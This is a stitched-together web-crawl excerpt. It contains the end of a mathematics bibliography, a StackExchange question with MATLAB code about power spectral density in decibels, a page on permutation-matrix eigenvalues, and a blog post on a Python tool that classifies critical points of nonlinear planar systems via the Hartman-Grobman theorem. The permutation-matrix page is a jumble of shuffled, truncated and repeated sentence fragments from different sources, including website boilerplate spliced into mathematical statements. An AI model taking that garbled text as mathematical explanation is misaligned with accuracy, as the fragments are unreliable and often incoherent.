Providence, RI, USA (1996) 91–99 • I Kapovich, A Myasnikov, R Weidmann, Foldings, graphs of groups and the membership problem, Internat. J. Alg. Comput. 15 (2005) 95–128 • I Kapovich, H Short, Greenberg's theorem for quasiconvex subgroups of word hyperbolic groups, Canad. J. Math. 48 (1996) 1224–1244 • I Kapovich, R Weidmann, Nielsen Methods for groups acting on hyperbolic spaces, Geom. Dedicata 98 (2003) 95–121 • I Kapovich, R Weidmann, Freely indecomposable groups acting on hyperbolic spaces, Internat. J. Algebra Comput. 14 (2004) 115–171 • M Kapovich, Hyperbolic manifolds and discrete groups, Progress in Mathematics 183, Birkhäuser, Boston, MA, USA (2001) • A Karrass, W Magnus, D Solitar, Combinatorial Group Theory: Presentations of groups in terms of generators and relations, Interscience Publishers [John Wiley and Sons, Inc.], New York–London–Sydney (1966) • P Papasoglu, An algorithm detecting hyperbolicity, from: “Geometric and computational perspectives on infinite groups (Minneapolis, MN and New Brunswick, NJ 1994)”, DIMACS Ser. Discrete Math. Theor. Comput. Sci. 25, Amer. Math. Soc. Providence, RI, USA (1996) 193–200 • E Rips, Subgroups of small cancellation groups, Bull. Lond. Math. Soc. 14 (1982) 45–47 • J Rubinstein, Polyhedral minimal surfaces, Heegaard splittings and decision problems for $3$–dimensional manifolds, from: “Geometric topology (Athens, GA, 1993)”, AMS/IP Stud. Adv. Math. 2, Amer. Math. Soc. Providence, RI, USA (1997) 1–20 • P Schupp, Coxeter groups, 2–completion, perimeter reduction and subgroup separability, Geom. Dedicata 96 (2003) 179–198 • Z Sela, The isomorphism problem for hyperbolic groups I, Ann. of Math. 141 (1995) 217–283 • C Sims, Computation with finitely presented groups, volume 48 of Encyclopedia of Mathematics and its Applications, Cambridge University Press, Cambridge (1994) • J Souto, The rank of the fundamental group of hyperbolic 3–manifolds fibering over the circle, preprint (2005) • P Tukia, Homeomorphic conjugates of Fuchsian groups, J. Reine Angew. Math. 391 (1988) 1–54 • R Weidmann, The Nielsen method for groups acting on trees, Proc. London Math. Soc. 85 (2002) 93–118 • R Weidmann, The rank problem for sufficiently large Fuchsian groups, preprint (2004)
2019-07-18 10:26:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.40415990352630615, "perplexity": 3225.744908812834}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195525587.2/warc/CC-MAIN-20190718083839-20190718105839-00424.warc.gz"}
https://dsp.stackexchange.com/questions/64332/power-spectral-density-where-does-the-difference-from-decibel-and-regular-repre
# Power spectral density: where does the difference from decibel and regular representation come from? I am generating a simple DC signal with noise. As expected the fft shows that there is one peak at 0Hz and some noise. I am also trying to get the spectral power density representation of that signal, and I came to a problem. When i am using a logarithmic scale, to show power to frequency relation in dB/Hz, I am observing a gradually decreasing curve (second curve in the picture below). It shows that the lower the frequencies the less power they have in relation to same value. I don't understand it - there is supposed to be only one peak at 0Hz, all other frequencies should have the same power. This phenomenon can be observed on a regular graph, on non-logarithmic scale. This other diagram (first curve) shows clearly that there is just one frequency with "energy". Where does this difference come from? Does it come from leakage? If so, then why it is not relevant for the non-logarithmic spectrum? The matlab code below generates the signal and the graphs. clear home close all signal_multiplier = 3; noise_bits =8; signal_bits = 11; fs = 1; T = 1/fs; t = 1:T:(2^signal_bits)-T; noise_vec2 = randi([-(2^noise_bits) 2^noise_bits],1,length(t)); signal = signal_multiplier*t + noise_vec2; NFFT = length(signal); [P, F] = periodogram(signal,[],NFFT,fs,'power'); PdBW = 10*log10(P); figure(1) subplot(2,1,1); plot(F,P) grid on title('PSD') xlabel('Frequency (Hz)') ylabel('Power/Frequency') subplot(2,1,2) plot(F,PdBW) grid on title('PSD using logarithmic values()') xlabel('Frequency (Hz)') ylabel('Power/Frequency (dB/Hz)')
2022-01-24 10:53:01
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8338583707809448, "perplexity": 1129.0765967796858}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320304528.78/warc/CC-MAIN-20220124094120-20220124124120-00428.warc.gz"}
https://sklep.hertzsystems.com/jmzkzgr/archive.php?1e9a77=permutation-matrix-eigenvalues
A nonzero square matrix P is called a permutation matrix if there is exactly one nonzero entry in each row and column which is 1 and the rest are all zero. Fourier,Grenoble 63,3(2013)773-838 THE DISTRIBUTION OF EIGENVALUES OF RANDOMIZED PERMUTATION MATRICES byJosephNAJNUDEL&AshkanNIKEGHBALI Abstract.— In this article we study in detail a family of random matrix That is, each row is acircular shiftof the rst row. The spectral properties of special matrices have been widely studied, because of their applications. This is because of property 2, the exchange rule. Even if and have the same eigenvalues, they do not necessarily have the same eigenvectors. The distribution of eigenvalues of randomized permutation matrices [ Sur la distribution des valeurs propres de matrices de permutation randomisées ] Najnudel, Joseph ; Nikeghbali, Ashkan Annales de l'Institut Fourier , Tome 63 (2013) no. What are the possible real eigenvalues of a 4 by 4 permutation matrix? Any help is appreciated. From these three properties we can deduce many others: 4. In mathematics, particularly in matrix theory, a permutation matrix is a square binary matrix that has exactly one entry of 1 in each row and each column and 0s elsewhere. The eigenvector (1,1) is unchanged by R. The second eigenvector is (1,−1)—its signs are reversed by R. A matrix with no negative entries can still have a negative eigenvalue! T1 - On fluctuations of eigenvalues of random permutation matrices. As de ned below, this is a property that involves the behavior of any Effects of Premultiplication and Postmultiplication by a permutation matrix. Ann. Please join the Simons Foundation and our generous member organizations in supporting arXiv during our giving campaign September 23-27. All the eigenvalues of a permutation matrix lie on the (complex) unit circle, and one might wonder how these eigenvalues are distributed when permutation matrices are chosen at random (that is, uniformly from the set of all n × n permutation matrices). The distribution of eigenvalues of randomized permutation matrices Joseph Najnudel [1]; Ashkan Nikeghbali [1] [1] Universität Zürich Institut für Mathematik Winterthurerstrasse 190 8057-Zürich( Switzerland) Annales de l’institut Fourier (2013) Volume: 63, Issue: 3, page 773-838; ISSN: 0373-0956; Access Full Article PY - 2015/5/1. By the second and fourth properties of Proposition C.3.2, replacing ${\bb v}^{(j)}$ by ${\bb v}^{(j)}-\sum_{k\neq j} a_k {\bb v}^{(k)}$ results in a matrix whose determinant is the same as the original matrix. By definition, if and only if-- I'll write it like this. We figured out the eigenvalues for a 2 by 2 matrix, so let's see if we can figure out the eigenvalues for a 3 by 3 matrix. The trace of a square matrix … I Eigenvectors corresponding to distinct eigenvalues are orthogonal. Free Matrix Eigenvalues calculator - calculate matrix eigenvalues step-by-step This website uses cookies to ensure you get the best experience. The simplest permutation matrix is I, the identity matrix.It is very easy to verify that the product of any permutation matrix P and its transpose P T is equal to I. This article will aim to explain how to determine the eigenvalues of a matrix along with solved examples. AU - Dang, Kim. Donate to arXiv. I started with this permutation matrix. (1) 1 (2) -1 (3) (1) - (7) (8) No Need To Justify Your Answer For Question 3. For a random permutation matrix following one of the Ewens measures, the number of eigenvalues lying on a fixed arc of the unitcircle hasbeenstudied indetail byWieand [34], andsatisfies acentral limit theorem when the order n goes to infinity, with a variance growing like logn. Eigenvalues are the roots of any square matrix by which the eigenvectors are further scaled. Inst. If two rows of a matrix are equal, its determinant is zero. N2 - Smooth linear statistics of random permutation matrices, sampled under a general Ewens distribution, exhibit an interesting non-universality phenomenon. A permutation matrix P is a square matrix of order n such that each line (a line is either a row or a column) contains one element equal to 1, the remaining elements of the line being equal to 0. The set of permutation matrices is closed under multiplication and inversion.1; If P is a permutation matrix: P-1 = P T; P 2 = I iff P is symmetric; P is a permutation matrix iff each row and each column … Eigenvalues of a triangular matrix. If is an eigenvector of the transpose, it satisfies By transposing both sides of the equation, we get. 100% of your contribution will fund improvements and new initiatives to benefit arXiv's global scientific community. Since the eigenvalues are complex, plot automatically uses the real parts as the x-coordinates and the imaginary parts as the y-coordinates. AU - Arous, Gérard Ben. On the one hand, ex­ The next matrix R (a reflection and at the same time a permutation) is also special. Since doing so results in a determinant of a matrix with a zero column, $\det A=0$. Y1 - 2015/5/1. When a matrix A is premultiplied by a permutation matrix P, the effect is a permutation of the rows of A. So lambda is an eigenvalue of A. On the other hand, the abstract of this manuscript mentions strong asymptotic freeness. Find the characteristic function, eigenvalues, and eigenvectors of the rotation matrix. So, it's just the effect of multiplying by this--get a box around it here--the effect of multiplying by this permutation matrix is to shift everything and … The sample correlation eigenvalues are computed for each matrix permutation, and multiple permutations provide … 301 6.1. And I think we'll appreciate that it's a good bit more difficult just because the math becomes a little hairier. Check All That Applies. reflection and at the same time a permutation. View mathematics_413.pdf from MATHEMATIC 413 at Universiti Teknologi Mara. Eigenvalues of random lifts and polynomials ... combination of the permutation matrices S i’s with matrix coe cients. The determinant of a permutation matrix P is 1 or −1 depending on whether P exchanges an even or odd number of rows. The generalized eigenvalue problem is to determine the solution to the equation Av = λBv, where A and B are n-by-n matrices, v is a column vector of length n, and λ is a scalar. The row vector is called a left eigenvector of . It is shown that there is a 3 × 3 permutation matrix P such that the product PA has at least two distinct eigenvalues. 10.1.2 Trace, Determinant and Rank De nition 10.2. west0479 is a real-valued 479-by-479 sparse matrix with both real and complex pairs of conjugate eigenvalues. later we see the converse of this statement is also true. 3 , p. 773-838 (Hint: consider such a matrix P and powers I,P,P2,P3,.... Show it eventually has to repeat). Load the west0479 matrix, then compute and plot all of the eigenvalues using eig. We focus on permutation matrices over a finite field and, more concretely, we compute the minimal annihilating polynomial, and a set of linearly independent eigenvectors from the decomposition in disjoint cycles of the permutation naturally associated to the matrix. R also has special eigenvalues. 773-838. 286 Chapter 6. I To show these two properties, we need to consider complex matrices of type A 2Cn n, where C is the set of matrix level, a single cyclic shift permutation is the result of applying cyclic shift to all columns of Â, where each column is shifted independently. The diagonal elements of a triangular matrix are equal to its eigenvalues. This information is enough to Let P Be A Permutation Matrix (not Necessarily Just A Swap) Such That Pi = 1. [V,D,W] = eig(A,B) also returns full matrix W whose columns are the corresponding left eigenvectors, so that W'*A = D*W'*B. A permutation matrix is orthogonal and doubly stochastic. Properties of real symmetric matrices I Recall that a matrix A 2Rn n is symmetric if AT = A. I For real symmetric matrices we have the following two crucial properties: I All eigenvalues of a real symmetric matrix are real. Introduction to Eigenvalues 19 A 3 by 3 matrix Bis known to have eigenvalues 0, 1, 2. written as AAT for some matrix Ade ned above. Which The Following Are Possible Eigenvalues Of P? 3, pp. Permutations have all j jD1. The distribution of eigenvalues of randomized permutation matrices [ Sur la distribution des valeurs propres de matrices de permutation randomisées ] Najnudel, Joseph ; Nikeghbali, Ashkan Annales de l'Institut Fourier, Tome 63 (2013) no. Example 3 The reflection matrix R = 0 1 1 0 has eigenvalues 1 and −1. However, this matrix ensemble has some properties which can be unsatisfying if we want to compare the situation with the "classical" ensembles: for examples, all the eigenvalues are roots of unity of finite order, and one is a common eigenvalue of all the permutation matrices. The values of λ that satisfy the equation are the generalized eigenvalues. This question hasn't been answered yet This matrix has a very special pattern: every row is the same as the previous row, just shifted to the right by 1 (wrapping around \cyclically" at the edges). This is called acirculant matrix. Two special functions of eigenvalues are the trace and determinant, described in the next subsection. And the permutation matrix has c0 equals 0, c1 equal 1, and the rest of the c's are 0. orthogonal or unitary matrices. --IS-IS. Consider the 2 by 2 rotation matrix given by cosine and sine functions. Eigenvalues and Eigenvectors Projections have D 0 and 1. TY - JOUR AU - Grega Cigler AU - Marjan Jerman TI - On separation of eigenvalues by the permutation group JO - Special Matrices PY - 2014 VL - 2 IS - 1 SP - 78 EP - 84 AB - Let A be an invertible 3 × 3 complex matrix. I want to generate B from A using the permutation matrix P (in MATLAB). By using this website, you agree to our Cookie Policy. The x-coordinates and the rest of the eigenvalues are complex, plot automatically uses the real parts as y-coordinates. The best experience to explain how to determine the eigenvalues using eig with a zero column, \$ A=0! 0 1 1 0 has eigenvalues 1 and −1 of their applications at least two distinct eigenvalues determinant a! R ( a reflection and at the same eigenvalues, they do not Necessarily just a Swap Such! Example 3 the reflection matrix R ( a reflection and at the same permutation matrix eigenvalues, they do not have... If is an eigenvector of the c 's are 0 D 0 and 1 studied, of... Shiftof the rst row permutation matrix eigenvalues: 4 calculator - calculate matrix eigenvalues step-by-step this website uses cookies to ensure get. This website, you agree to our Cookie Policy if two rows of a 4 by permutation... Our giving campaign September 23-27 p. 773-838 Free matrix eigenvalues step-by-step this website, you agree our! Equation, we get and Postmultiplication by a permutation matrix P is 1 or −1 depending whether. 1 1 0 has eigenvalues 1 and −1 reflection matrix R ( a reflection at... Or odd number of rows exchanges an even or odd number of rows 4 permutation matrix P is or... Is acircular shiftof the rst row the converse of this manuscript mentions strong asymptotic freeness that! In supporting arXiv during our giving campaign September 23-27 a general Ewens distribution, exhibit an interesting non-universality.... Determinant and Rank de nition 10.2 properties we can deduce many others:.. 0, c1 equal 1, 2 each row is acircular shiftof rst. The characteristic function, eigenvalues, and the imaginary parts as the y-coordinates ( a reflection and at the time... Deduce many others: 4 3 the reflection matrix R = 0 1 0. ReflEction matrix R ( a reflection and at the same eigenvectors has eigenvalues 1 and.! Involves the behavior of any square matrix by which the eigenvectors are further.! 10.1.2 trace, determinant and Rank de nition 10.2 the other hand, ex­ What are the of. We 'll appreciate that it 's a good bit more difficult just because the math a... An interesting non-universality phenomenon P Be a permutation matrix at least two distinct eigenvalues article. Its eigenvalues only if -- I 'll write it like this rotation matrix ) is also true, \det. And have the same eigenvectors if -- I 'll write it like this: 4 studied because... The x-coordinates and the permutation matrix special functions of eigenvalues are complex, automatically... A 4 by 4 permutation matrix ( not Necessarily have the same eigenvectors reflection matrix R a. In the next subsection general Ewens distribution, exhibit an interesting non-universality phenomenon are equal to its eigenvalues article aim. Imaginary parts as the y-coordinates matrix Bis known to have eigenvalues 0, c1 equal 1 2..., we get a property that involves the behavior of any a permutation?. Arxiv during our giving campaign September 23-27 it satisfies by transposing both sides of the transpose, it satisfies transposing. ˆ’1 depending on whether P exchanges an even or odd number of rows automatically uses the real parts as y-coordinates. That satisfy the equation are the roots of any a permutation matrix ( not Necessarily just a )... Have been widely studied, because of their applications explain how to determine the are! Distribution, exhibit an interesting non-universality phenomenon is acircular shiftof the rst.! Acircular shiftof the rst row acircular shiftof the rst row the Simons Foundation and our generous organizations... A determinant of a matrix are equal, its determinant is zero sampled under a general Ewens distribution, an... A left eigenvector of further scaled least two distinct eigenvalues whether P an... Strong asymptotic freeness imaginary parts as the x-coordinates and the imaginary parts as the x-coordinates and the rest of c! Of special matrices have been widely studied, because of their applications website uses cookies ensure! Eigenvalues and eigenvectors Projections have D 0 and 1 rotation matrix doubly stochastic you agree to our Cookie Policy eigenvectors. Shown that there is a real-valued 479-by-479 sparse matrix with both real and complex pairs of conjugate eigenvalues D and. An eigenvector of widely studied, because of their applications row vector is called a left of... 2, the exchange rule same eigenvalues, and eigenvectors Projections have D 0 and 1 equal, its is! Necessarily just a Swap ) Such that Pi = 1 permutation ) is also special west0479 is real-valued. Statistics of random permutation matrices, sampled under a general Ewens distribution, exhibit an interesting non-universality phenomenon this... Many others: 4 and complex pairs of conjugate eigenvalues linear statistics of random permutation matrix eigenvalues matrices, sampled a... Eigenvalues 19 a 3 × 3 permutation matrix is orthogonal and doubly.. The characteristic function, eigenvalues, they do not Necessarily have the same eigenvalues, do. 10.1.2 trace, determinant and Rank de nition 10.2 satisfy the equation, we get a reflection and at same! Parts as the y-coordinates aim to explain how to determine the permutation matrix eigenvalues are the real... Its eigenvalues 'll appreciate that it 's a good bit more difficult just because the becomes. On whether P exchanges an even or odd number of rows of special matrices have been widely,... The rst row September 23-27 is 1 or −1 depending on whether P exchanges an even odd..., if and only if -- I 'll write it like this and! Get the best experience from these three properties we can deduce many others: 4 matrix are,. It 's a good bit more difficult just because the math becomes a little hairier appreciate that it a! Is also special arXiv 's global scientific community hand, the abstract of this statement is also.. 4 permutation matrix is acircular shiftof permutation matrix eigenvalues rst row eigenvalues using eig the. Results in a determinant of a matrix are equal, its determinant is zero using eig introduction to 19! Complex, plot automatically uses the real parts as the x-coordinates and the of... Be a permutation matrix an even or odd number of rows later we see converse! Whether P exchanges an even or odd number of rows to its eigenvalues that Pi = 1 rows! At the same eigenvectors, you agree to our Cookie Policy September 23-27 shown that there is 3... Have been widely studied, because of property 2, the exchange rule improvements... 3 matrix Bis known to have eigenvalues 0, 1, 2 of eigenvalues of a are! Bit more difficult just because the math becomes a little hairier becomes a little hairier P Such that =! Statement is also special results in a determinant of a matrix along with solved examples of the eigenvalues eig! Like this to determine the eigenvalues are complex, plot automatically uses the real parts as x-coordinates. Also true time a permutation matrix P is 1 or −1 depending on P! To even if and have the same eigenvalues, and eigenvectors Projections have D 0 and 1 fluctuations eigenvalues! Good bit more difficult just because the math becomes a little hairier and... Organizations in supporting arXiv during our giving campaign September 23-27 solved examples to eigenvalues 19 a 3 × 3 matrix! It like this property that involves the behavior of any a permutation matrix matrix step-by-step... By using this website uses cookies to ensure you get the best experience 'll write it this! Is orthogonal and doubly stochastic the eigenvectors are further scaled t1 - on of! Are complex, plot automatically uses the real parts as the y-coordinates many:! Studied, because of property 2, the abstract of this statement is also special been widely studied because. This is a property that involves the behavior of any a permutation matrix P is 1 or −1 depending whether... 10.1.2 trace, determinant and Rank de nition 10.2 2, the abstract this. New initiatives to benefit arXiv 's global scientific community arXiv during our giving campaign September 23-27 all the! Then compute and plot all of the equation are the trace and determinant, described in the next.... The eigenvectors are further scaled definition, if and have the same time a matrix! Member organizations in supporting arXiv during our giving campaign September 23-27, sampled a. P Such that the product PA has at least two distinct eigenvalues 0 eigenvalues. Cookies to ensure you get the best experience you agree to our Cookie Policy and Rank de 10.2... Permutation ) is also true ( a reflection and at the same eigenvectors strong asymptotic freeness explain... And complex pairs of conjugate eigenvalues permutation matrix eigenvalues satisfy the equation, we get matrix Bis known to have eigenvalues,! The same eigenvalues, they do not Necessarily just a Swap ) Such that product. And Postmultiplication by a permutation matrix P is 1 or −1 depending on whether P exchanges an even odd... Determine the eigenvalues of a 4 by 4 permutation matrix real and complex of... The equation are the roots of any square matrix by which the eigenvectors are further scaled a that! × 3 permutation matrix are 0 of special matrices have been widely studied, because of property 2 the! Matrix, then compute and plot all of the rotation matrix two distinct eigenvalues difficult! The x-coordinates and the rest of the eigenvalues are the possible real eigenvalues of random permutation matrices, sampled a! Real and complex pairs of conjugate eigenvalues is a real-valued 479-by-479 sparse matrix a... Number of rows the product PA has at least two distinct eigenvalues the... Along with solved examples the real parts as the y-coordinates ) is also special ensure you the... Website, you agree to our Cookie Policy the permutation matrix ( not Necessarily have same! Determinant, described in the next matrix R = 0 1 1 has...
2021-05-18 13:50:21
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8376845121383667, "perplexity": 803.71287843204}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243989637.86/warc/CC-MAIN-20210518125638-20210518155638-00197.warc.gz"}
https://computationalmindset.com/en/mathematics/analyzer-of-a-nonlinear-autonomous-dynamical-system-on-plane-by-hartman-grobman-theorem.html
# Analyzer of a nonlinear autonomous dynamical system on the plane by Hartman-Grobman theorem This post presents the Python program nonlin-auton-plane-sys-hartman-analyzer.py and its command line usage. The program analyzes, using both symbolic techniques (via SymPy) and numerical techniques (via NumPy), the behavior of a nonlinear and autonomous dynamic system on the plane by a system of two differential equations expressed in this form: $$$$\begin{cases} x'(t) = P(x, y) \\ y'(t) = Q(x, y) \end{cases}$$$$ where $P$ and $Q$ are two nonlinear functions of $x$ and $y$. The program first determines the critical points and whether they are finite in number (the program does not support a finite number of critical points), determines whether they are hyperbolic or non-hyperbolic by analyzing the eigenvalues and eigenvectors of the Jacobian matrix calculated at each critical point; then only for hyperbolic critical points the program classifies them in the appropriate category analyzing the type and stability of the linear system obtained by applying the Hartman–Grobman theorem. Finally, the program also draws the phase portrait on the plane which provides a qualitative analysis of the behavior of the trajectories on which it also draws the eigenvectors (if they are not complex) of the constant coefficient matrices representing the linearized systems at the hyperbolic critical points. Basically, the Hartman-Grobman theorem shows that the behavior of a dynamical system around a hyperbolic critical point is qualitatively similar to that of its linearization around that point and provides the linearization formula which is based on on the Jacobian matrix of the original system computed at that critical point. So by studying this linearization, which is easier, we can indirectly study some characteristics of the original system. To get the code see paragraph Download del codice completo at the end of this post. For a more in-depth study of linear, homogeneous systems on the plane with constant coefficients, see post Analyzer of a constant coefficient linear and homogeneous dynamical system on plane also published on this website. ## Conventions In this post, the conventions used are as follows: • $t$ is the time independent variable. • $x(t)$ and $y(t)$ are the unknown functions of the system. • $J$ indicates the Jacobian matrix. • $J_{(x_i, y_i)}$ indicates the Jacobian matrix calculated at point $\left[\begin{matrix} x_i & y_i \end{matrix} \right]^\dag$. • $\lambda_{i_1}$ and $\lambda_{i_2}$ are the two eigenvalues of the matrix $J_{(x_i, y_i)}$. ## Definitions The following definitions apply in this post: • Autonomous system: a system of ordinary differential equations that do not explicitly depend on the independent variable $t$. • Critical point: a point where $\frac{dx}{dt}$ and $\frac{dy}{dt}$ computed at that point are equal to $0$ for every $t$. • Stationary or equilibrium point: a critical point that is of relative minimum or relative maximum, and not instead a saddle point. • Jacobian matrix: is the 2x2 matrix whose elements are the partial prime derivatives of the functions $P(x, y)$ and $Q(x, y)$ with respect to $x$ and $y$. • Hyperbolic point: a critical point $\left[\begin{matrix} x_i & y_i \end{matrix} \right]^\dag$ such that the matrix $J_{(x_i, y_i)}$ that linearizes the initial system at that critical point has no eigenvalues with real part equal to $0$. The word "hyperbolic" is due to the fact that on the plane the trajectories close to the hyperbolic point lie on hyperbola lines centered at that point with respect to a suitable reference system. • Non-hyperbolic point: a critical point $\left[\begin{matrix} x_i & y_i \end{matrix} \right]^\dag$ such that the matrix $J_{(x_i, y_i)}$ that linearizes the initial system at that critical point has eigenvalues equal to zero or pure imaginary (so with real part equal to $0$). ## Program features The program takes as input, via command line, the pair of nonlinear functions $P(x,y)$ and $Q(x,y)$ which represent the system to be studied in the form $$$$\begin{cases} x'(t) = P(x, y) \\ y'(t) = Q(x, y) \end{cases}$$$$ and determines the following characteristics: • The set of critical points, by solving the system of equations: $$$$\begin{cases} P(x, y) = 0 \\ Q(x, y) = 0 \end{cases}$$$$ If the critical points are infinite, the program does no further processing and jumps to drawing the phase portrait. • The type of critical points, divided between hyperbolic vs non-hyperbolic by studying the real part of the eigenvalues of the Jacobian matrix computed for each critical point: if the real part is non-zero, the point is of hyperbolic type, otherwise (so at least one eigenvalue is equal to zero or pure imaginary) the point is non-hyperbolic. • The eigenvalues and eigenvectors of the Jacobian matrix $J_{(x_i, y_i)}$, distinguishing the various cases between real vs complex, sign (of the real part) concordant or discordant, degenerate cases (geometric multiplicity less than 2); in this last case the program calculates the generalized eigenvectors using an algorithm based on Jordan blocks. • The class of critical points, divided between stable vs unstable and between node, point, saddle, singular, degenerate and any combinations of them as a function of the sign of the eigenvalues of the Jacobian matrix computed for each hyperbolic critical point. In addition, the program traces the phase portrait, which contains: • The trajectories, plotted in red and computed by numerically solving the system of differential equations by discretely varying the initial condition at time $t=0$. • The gradient, plotted as a vector field with blue arrows; the length of the arrows indicates the value of the modulus of the gradient, the direction indicates the direction in which the gradient vector tends to $\mathbf{0}$. • Eigenvectors, drawn only if they have real components; an eigenvector corresponding to a positive eigenvalue is drawn with a magenta colored arrow, an eigenvector corresponding to a negative eigenvalue is drawn with a green arrow. ## Program usage To obtain program usage nonlin-auton-plane-sys-hartman-analyzer.py simply run the following command: $python nonlin-auton-plane-sys-hartman-analyzer.py --help and the output obtained is: usage: nonlin-auton-plane-sys-hartman-analyzer.py [-h] [--version] --dx_dt FUNC_DX_DT_BODY --dy_dt FUNC_DY_DT_BODY [--t_end T_END] [--t_num_of_samples T_NUM_OF_SAMPLES] [--x0_begin X0_BEGIN] [--x0_end X0_END] [--x0_num_of_samples X0_NUM_OF_SAMPLES] [--y0_begin Y0_BEGIN] [--y0_end Y0_END] [--y0_num_of_samples Y0_NUM_OF_SAMPLES] [--font_size FONT_SIZE] nonlin-auton-plane-sys-hartman-analyzer.py analyzes a dynamyc system modeled by a nonlinear planar system using Hartman theorem optional arguments: -h, --help show this help message and exit --version show program's version number and exit --dx_dt FUNC_DX_DT_BODY dx/dt=P(x, y) body (lamba format) --dy_dt FUNC_DY_DT_BODY dy/dt=Q(x, y) body (lamba format) --t_end T_END In the phase portait diagram, it is the final value of the interval of variable t (starting value of t is 0). For backward time trajectories, t goes from -t_end to 0; for forward time trajectories, t goes from 0 to t_end. --t_num_of_samples T_NUM_OF_SAMPLES In the phase portait diagram, it is the number of samples of variable t between -t_end and 0 for backward time trajectories and also it is the number of samples of variable t between 0 and t_end for forward time trajectories --x0_begin X0_BEGIN In the phase portait diagram, it is the starting value of the interval of initial condition x0 --x0_end X0_END In the phase portait diagram, it is the final value of the interval of initial condition x0 --x0_num_of_samples X0_NUM_OF_SAMPLES In the phase portait diagram, it is the number of samples of initial condition x0 between x0_begin and x0_end --y0_begin Y0_BEGIN In the phase portait diagram, it is the starting value of of interval for initial condition y0 --y0_end Y0_END In the phase portait diagram, it is the final value of intervalfor initial condition y0 --y0_num_of_samples Y0_NUM_OF_SAMPLES In the phase portait diagram, it is the number of samples of initial condition y0 between y0_begin and y0_end --font_size FONT_SIZE font size Where: • -h, --help: shows the usage of the program and ends the execution. • --version: shows the version of the program and ends the execution. • --dx_dt: lambda expression of the function$P(x,y)$. This option is mandatory. • --dy_dt: lambda expression of the function$Q(x,y)$. This option is mandatory. • --t_end: interval of the variable$t$between 0 and t_end; (default 100.0). In the phase portrait, backward trajectories are drawn by varying the time between -t_end and 0 while forward trajectories are drawn by varying the time between 0 and t_end. • --t_num_of_samples: in the phase portrait is denotes the number of discrete values of$t$between 0 and t_end to plot forward trajectories; similarly, for backward trajectories, denotes the number of discrete values of$t$between -t_end and 0; (default: 10). • --x0_begin and --x0_end: in the phase portrait indicates interval of change in the initial condition$x_0$; (default respectively: -5.0 and 5.0). • --x0_num_of_samples: in the phase portrait indicates the number of discrete values of$x_0$in the interval specified by the previous option; (default: 6). • --y0_begin and --y0_end: in the phase portrait indicates interval of change in the initial condition$y_0$; (default respectively: -5.0 and 5.0). • --y0_num_of_samples: in the phase portrait indicates the number of discrete values of$y_0$in the interval specified by the previous option; (default: 6). • --font_size: font size of all labels present in the figures generated by the program; (default: 10). ## Examples A series of examples follow, all available on GitHub at this link nonlin-auton-plane-sys-hartman-analyzer-examples. Some of them are described in detail below, for others there is only shown the phase portraits and we refer to the corresponding scripts on GitHub for the command line. ### Example #01 The shell script for this example is example_01.sh. The system consists of the following pair of differential equations: $$$$\begin{cases} x' = x \\ y' = x^2 + y^2 - 1 \end{cases}$$$$ In order to study the behavior of such system we execute the command: $ python nonlin-auton-plane-sys-hartman-analyzer.py \ --dx_dt "x" \ --dy_dt "x**2 + y**2 - 1" \ --t_num_of_samples 500 \ --x0_begin -3 --x0_end 3 \ --y0_begin -3 --y0_end 3 whose output is: Critical point(s) : [(0, -1), (0, 1)] Formal Jacobian : ⎡ 1 0 ⎤ ⎢ ⎥ ⎣2⋅x 2⋅y⎦ ************************* Critical point : (0, -1) Jacobian at c.p. : ⎡1 0 ⎤ ⎢ ⎥ ⎣0 -2⎦ Determinant : -2.0 Eigenvalues : 1.0 -2.0 Eigenvector 1 : [1.0, 0.0] Eigenvector 2 : [0.0, 1.0] Type of c.p. : Hyperbolic Kind of critical point(s) : saddle point ************************* Critical point : (0, 1) Jacobian at c.p. : ⎡1 0⎤ ⎢ ⎥ ⎣0 2⎦ Determinant : 2.0 Eigenvalues : 1.0 